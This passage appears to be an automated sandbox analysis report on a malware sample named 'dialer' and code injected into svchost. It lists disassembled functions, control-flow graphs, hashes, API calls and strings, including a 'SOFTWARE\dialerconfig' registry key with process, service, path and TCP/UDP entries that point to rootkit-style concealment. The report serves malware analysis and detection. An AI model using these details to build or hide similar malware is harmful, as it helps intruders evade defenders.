                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                              • String ID: 0$X$\BaseNamedObjects\tolfdedwfkhaxzps$`
                                                              • API String ID: 780471329-127241884
                                                              • Opcode ID: ca329b8358bff8b4e8ff36211ae56e3d8ec4941fef26ae660c8b814acf6b5e73
                                                              • Instruction ID: b7a8635e81b479a36268048e01487e4521078d4d17ad74f469b434e1b5bcd61f
                                                              • Opcode Fuzzy Hash: ca329b8358bff8b4e8ff36211ae56e3d8ec4941fef26ae660c8b814acf6b5e73
                                                              • Instruction Fuzzy Hash: 1D1259B2618B8081E762CB1AF8453EA77A4F789794F418215EBAC57BF5DF78C189C700
                                                              Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                              • String ID:
                                                              • API String ID: 2643109117-0
                                                              • Opcode ID: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                              • Instruction ID: 1a1351f792f9bf4967cc34d0f53f5ff7a53c0879af89bef87e4895d8dd39205b
                                                              • Opcode Fuzzy Hash: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                              • Instruction Fuzzy Hash: 9851F1F1615A4485FA16EF27F9A47EA27A1BB8C7D0F449125FB4E873B2DF3884958300
                                                              Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 517 140001c72-140001c79 511->517 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                              APIs
                                                              • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                              • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                              • memcpy.MSVCRT ref: 0000000140001CE0
                                                              • GetLastError.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                              • API String ID: 2595394609-2123141913
                                                              • Opcode ID: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                              • Instruction ID: fdcea6415f7229f01c984092642b28fb5a36d70c662bb5773ed37d7d1973f443
                                                              • Opcode Fuzzy Hash: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                              • Instruction Fuzzy Hash: D64132B1201A4486FA26DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                                              Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 533 14000220b-140002212 LeaveCriticalSection 531->533 534 14000212e-14000213c 531->534 535 140002272-140002280 532->535 536 140002223-14000222d 532->536 533->532 537 14000214d-140002159 TlsGetValue GetLastError 534->537 538 140002241-140002263 DeleteCriticalSection 536->538 539 14000222f 536->539 541 14000215b-14000215e 537->541 542 140002140-140002147 537->542 538->535 540 140002230-14000223f free 539->540 540->538 540->540 541->542 543 140002160-14000216d 541->543 542->533 542->537 543->542
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                              • String ID:
                                                              • API String ID: 3326252324-0
                                                              • Opcode ID: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                              • Instruction ID: afb0d6c5a9c099b73ff3c6c79e798d45aa650c7d30c6adae1a01f4103a689b7c
                                                              • Opcode Fuzzy Hash: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                              • Instruction Fuzzy Hash: 4F21B3B1305A11D2FA6BDB53F9583E82364BB6CBD0F444121FF5A576B4DB798986C300
                                                              Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 556 140001f23-140001f2d 552->556 557 140001ed3-140001ee2 signal 552->557 554 140001eb5-140001eba 553->554 555 140001efb-140001f0a call 140006c20 553->555 554->548 561 140001ec0 554->561 555->556 566 140001f0c-140001f10 555->566 559 140001f43-140001f45 556->559 560 140001f2f-140001f3f 556->560 557->556 562 140001ee4-140001ee8 557->562 559->548 560->559 561->556 563 140001eea-140001ef9 signal 562->563 564 140001f4e-140001f53 562->564 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CCG
                                                              • API String ID: 0-1584390748
                                                              • Opcode ID: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                              • Instruction ID: fad6180ef962ac1bf57e0d6b6b3de3a82f7bb0a4b16ac2ded5004f5be79f4ed3
                                                              • Opcode Fuzzy Hash: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                              • Instruction Fuzzy Hash: 13214CB2B0150642FA77DA2BF5903F91192ABCC7E4F258536FF59473F5DE3888828241
                                                              Function 0000000140006670 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 570 140006670-14000668c 571 1400066bb-1400066df call 140006660 570->571 572 14000668e 570->572 577 140006906-140006918 571->577 579 1400066e5-1400066f9 call 140006660 571->579 573 140006695-14000669a 572->573 575 1400066a0-1400066a3 573->575 575->577 578 1400066a9-1400066af 575->578 578->575 580 1400066b1-1400066b6 578->580 583 14000670f-140006721 579->583 580->577 584 140006703-14000670d 583->584 585 140006723-14000673d call 140006660 583->585 584->583 586 140006765-140006768 584->586 590 14000673f-140006761 call 140006660 * 2 585->590 591 140006700 585->591 586->577 589 14000676e-14000679a call 140006660 malloc 586->589 596 1400068fc 589->596 597 1400067a0-1400067a2 589->597 590->584 603 140006763 590->603 591->584 596->577 597->596 599 1400067a8-1400067d8 call 140006660 * 2 597->599 606 1400067e0-1400067f7 599->606 603->589 607 1400068d3-1400068db 606->607 608 1400067fd-140006803 606->608 611 1400068e6-1400068f4 607->611 612 1400068dd-1400068e0 607->612 609 140006852 608->609 610 140006805-140006823 call 140006660 608->610 615 140006857-140006899 call 140006660 * 2 609->615 618 140006830-14000684e 610->618 611->573 614 1400068fa 611->614 612->606 612->611 614->577 623 1400068c8-1400068cf 615->623 624 14000689b 615->624 618->618 620 140006850 618->620 620->615 623->607 625 1400068a0-1400068ac 624->625 626 1400068c3 625->626 627 1400068ae-1400068c1 625->627 626->623 627->625 627->626
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: \BaseNamedObjects\kcomrvhyxww$czIt$zvIt
                                                              • API String ID: 2803490479-4156244989
                                                              • Opcode ID: 81b7f587ddda00cfd30067675353acb84889c5bcd98c01046e2fbf71dfc3e994
                                                              • Instruction ID: 21cb044f4a7c25217858771e85b064502aacfafeff9637893254959b2351a677
                                                              • Opcode Fuzzy Hash: 81b7f587ddda00cfd30067675353acb84889c5bcd98c01046e2fbf71dfc3e994
                                                              • Instruction Fuzzy Hash: 8C7182B67106148BE756EF26F500BAA3692F38CBDCF044214FF4A677A5EB34D8509750
                                                              Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 628 140001880-14000189c 629 1400018a2-1400018f9 call 140002420 call 140002660 628->629 630 140001a0f-140001a1f 628->630 629->630 635 1400018ff-140001910 629->635 636 140001912-14000191c 635->636 637 14000193e-140001941 635->637 639 14000194d-140001954 636->639 640 14000191e-140001929 636->640 638 140001943-140001947 637->638 637->639 638->639 642 140001a20-140001a26 638->642 643 140001956-140001961 639->643 644 14000199e-1400019a6 639->644 640->639 641 14000192b-14000193a 640->641 641->637 647 140001b87-140001b98 call 140001d40 642->647 648 140001a2c-140001a37 642->648 645 140001970-14000199c call 140001ba0 643->645 644->630 646 1400019a8-1400019c1 644->646 645->644 652 1400019df-1400019e7 646->652 648->644 649 140001a3d-140001a5f 648->649 655 140001a7d-140001a97 649->655 653 1400019e9-140001a0d VirtualProtect 652->653 654 1400019d0-1400019dd 652->654 653->654 654->630 654->652 658 140001b74-140001b82 call 140001d40 655->658 659 140001a9d-140001afa 655->659 658->647 665 140001b22-140001b26 659->665 666 140001afc-140001b0e 659->666 669 140001b2c-140001b30 665->669 670 140001a70-140001a77 665->670 667 140001b5c-140001b6c 666->667 668 140001b10-140001b20 666->668 667->658 672 140001b6f call 140001d40 667->672 668->665 668->667 669->670 671 140001b36-140001b57 call 140001ba0 669->671 670->644 670->655 671->667 672->658
                                                              APIs
                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                              • API String ID: 544645111-395989641
                                                              • Opcode ID: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                              • Instruction ID: 7b3573af97f4a1eacab2cf6b7141f308442550d87ff31978870e308cef0d76bf
                                                              • Opcode Fuzzy Hash: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                              • Instruction Fuzzy Hash: 265105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                              Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 676 140001800-140001810 677 140001812-140001822 676->677 678 140001824 676->678 679 14000182b-140001867 call 140002290 fprintf 677->679 678->679
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: fprintf
                                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                              • API String ID: 383729395-3474627141
                                                              • Opcode ID: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                              • Instruction ID: a3faaabf629437a0964f4525ace193ebe5e29d4333283446a04dc1db5ce24221
                                                              • Opcode Fuzzy Hash: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                              • Instruction Fuzzy Hash: 47F09671A14A8482E612EF6AB9417ED6361E75D7C1F50D211FF4DA76A1DF3CD182C310
                                                              Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 682 14000219e-1400021a5 683 140002272-140002280 682->683 684 1400021ab-1400021c2 EnterCriticalSection 682->684 685 140002265-14000226c LeaveCriticalSection 684->685 686 1400021c8-1400021d6 684->686 685->683 687 1400021e9-1400021f5 TlsGetValue GetLastError 686->687 688 1400021f7-1400021fa 687->688 689 1400021e0-1400021e7 687->689 688->689 690 1400021fc-140002209 688->690 689->685 689->687 690->689
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                              • String ID:
                                                              • API String ID: 682475483-0
                                                              • Opcode ID: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                              • Instruction ID: 57be894ec6e479b01b3bdbc431c3049754870fdb45279c41188df5f75f20f987
                                                              • Opcode Fuzzy Hash: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                              • Instruction Fuzzy Hash: 2F01B6B5305A0192FA5BDB53FD083D86364BB6CBD1F854021EF09536B4DB75C996C300

                                                              Execution Graph

                                                              Execution Coverage:56.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:87.5%
                                                              Total number of Nodes:8
                                                              Total number of Limit Nodes:1

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                              Executed Functions

                                                              Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000040.00000002.3066852301.0000000140840000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000040.00000002.3066679529.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000040.00000002.3066852301.00000001404DC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000040.00000002.3066852301.0000000140500000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000040.00000002.3066852301.0000000140503000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000040.00000002.3066852301.000000014078B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000040.00000002.3066852301.000000014080D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000040.00000002.3071777752.0000000140847000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                              • String ID:
                                                              • API String ID: 1941872368-0
                                                              • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                              • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                              • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                              • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                              Execution Graph

                                                              Execution Coverage:0.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:73
                                                              Total number of Limit Nodes:2
                                                              execution_graph 14790 26a8799273c 14792 26a8799276a 14790->14792 14791 26a87992858 LoadLibraryA 14791->14792 14792->14791 14793 26a879928d4 14792->14793 14794 26a879c1abc 14799 26a879c1628 GetProcessHeap 14794->14799 14796 26a879c1ad2 Sleep SleepEx 14797 26a879c1acb 14796->14797 14797->14796 14798 26a879c1598 StrCmpIW StrCmpW 14797->14798 14798->14797 14800 26a879c1648 _invalid_parameter_noinfo 14799->14800 14844 26a879c1268 GetProcessHeap 14800->14844 14802 26a879c1650 14803 26a879c1268 2 API calls 14802->14803 14804 26a879c1661 14803->14804 14805 26a879c1268 2 API calls 14804->14805 14806 26a879c166a 14805->14806 14807 26a879c1268 2 API calls 14806->14807 14808 26a879c1673 14807->14808 14809 26a879c168e RegOpenKeyExW 14808->14809 14810 26a879c18a6 14809->14810 14811 26a879c16c0 RegOpenKeyExW 14809->14811 14810->14797 14812 26a879c16e9 14811->14812 14813 26a879c16ff RegOpenKeyExW 14811->14813 14848 26a879c12bc RegQueryInfoKeyW 14812->14848 14814 26a879c1723 14813->14814 14815 26a879c173a RegOpenKeyExW 14813->14815 14859 26a879c104c RegQueryInfoKeyW 14814->14859 14819 26a879c1775 RegOpenKeyExW 14815->14819 14820 26a879c175e 14815->14820 14823 26a879c1799 14819->14823 14824 26a879c17b0 RegOpenKeyExW 14819->14824 14822 26a879c12bc 13 API calls 14820->14822 14825 26a879c176b RegCloseKey 14822->14825 14826 26a879c12bc 13 API calls 14823->14826 14827 26a879c17d4 14824->14827 14828 26a879c17eb RegOpenKeyExW 14824->14828 14825->14819 14831 26a879c17a6 RegCloseKey 14826->14831 14832 26a879c12bc 13 API calls 14827->14832 14829 26a879c1826 RegOpenKeyExW 14828->14829 14830 26a879c180f 14828->14830 14835 26a879c1861 RegOpenKeyExW 14829->14835 14836 26a879c184a 14829->14836 14834 26a879c104c 5 API calls 14830->14834 14831->14824 14833 26a879c17e1 RegCloseKey 14832->14833 14833->14828 14837 26a879c181c RegCloseKey 14834->14837 14839 26a879c1885 14835->14839 14840 26a879c189c RegCloseKey 14835->14840 14838 26a879c104c 5 API calls 14836->14838 14837->14829 14841 26a879c1857 RegCloseKey 14838->14841 14842 26a879c104c 5 API calls 14839->14842 14840->14810 14841->14835 14843 26a879c1892 RegCloseKey 14842->14843 14843->14840 14865 26a879d6168 14844->14865 14846 26a879c1283 GetProcessHeap 14847 26a879c12ae _invalid_parameter_noinfo 14846->14847 14847->14802 14849 26a879c1327 GetProcessHeap 14848->14849 14850 26a879c148a RegCloseKey 14848->14850 14853 26a879c133e _invalid_parameter_noinfo 14849->14853 14850->14813 14851 26a879c1476 GetProcessHeap HeapFree 14851->14850 14852 26a879c1352 RegEnumValueW 14852->14853 14853->14851 14853->14852 14855 26a879c13d3 GetProcessHeap 14853->14855 14856 26a879c141e lstrlenW GetProcessHeap 14853->14856 14857 26a879c13f3 GetProcessHeap HeapFree 14853->14857 14858 26a879c1443 StrCpyW 14853->14858 14866 26a879c152c 14853->14866 14855->14853 14856->14853 14857->14856 14858->14853 14860 26a879c11b5 RegCloseKey 14859->14860 14863 26a879c10bf _invalid_parameter_noinfo 14859->14863 14860->14815 14861 26a879c10cf RegEnumValueW 14861->14863 14862 26a879c114e GetProcessHeap 14862->14863 14863->14860 14863->14861 14863->14862 14864 26a879c116e GetProcessHeap HeapFree 14863->14864 14864->14863 14867 26a879c157c 14866->14867 14870 26a879c1546 14866->14870 14867->14853 14868 26a879c1565 StrCmpW 14868->14870 14869 26a879c155d StrCmpIW 14869->14870 14870->14867 14870->14868 14870->14869

                                                              Executed Functions

                                                              Function 0000026A879C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 8b3f40dc757b03efebebe1ec2b21d8ee4b81ef9a05be350be4598fcd48a0c6e5
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 99715D76310E1086EF90DF66E89869D3BB4FB85B88F405111EE4E67B68EF3AC444CB45
                                                              Function 0000026A879C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
